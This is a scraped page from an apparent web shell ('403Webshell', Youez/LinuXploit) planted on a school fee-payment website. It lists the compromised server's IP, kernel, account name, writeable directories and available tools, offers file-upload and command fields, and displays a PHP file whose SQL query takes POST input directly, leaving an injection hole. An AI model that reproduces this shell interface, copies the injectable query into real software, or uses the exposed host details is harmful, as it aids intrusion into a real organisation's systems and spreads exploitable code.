403Webshell
Server IP : 216.106.184.20  /  Your IP : 216.73.216.234
Web Server : LiteSpeed
System : Linux asmodeus.in-hell.com 5.14.0-570.58.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 29 06:24:11 EDT 2025 x86_64
User : sekoaid1 ( 1891)
PHP Version : 7.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/sekoaid1/spp.raudhatulfalah.sch.id/admin/combobox/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/sekoaid1/spp.raudhatulfalah.sch.id/admin/combobox/pilihan_posbayar.php
<?php
    include '../../config/koneksi.php';

    $idUnit=$_POST['idUnit'];
    $idPosBayar=$_POST['idPosBayar'];

    echo '<option value="" disabled="" selected="">- Pilih Pos -</option>';
    
    $query = mysqli_query($koneksi,"SELECT pos_bayar.*, akun_biaya.unitSekolah FROM pos_bayar LEFT JOIN akun_biaya ON pos_bayar.kodeAkun = akun_biaya.idAkun WHERE akun_biaya.unitSekolah='$idUnit' AND pos_bayar.stdel='0' ORDER BY pos_bayar.idPosBayar ASC");
    
    while ($q = mysqli_fetch_array($query)) {
        if ($idPosBayar == $q['idPosBayar']){
            echo '<option value="'.$q['idPosBayar'].'" selected>'.$q['nmPosBayar'].'</option>';
        }else{
            echo '<option value="'.$q['idPosBayar'].'">'.$q['nmPosBayar'].'</option>';
        }
    }
    
    
    
?>

Youez - 2016 - github.com/yon3zu
LinuXploit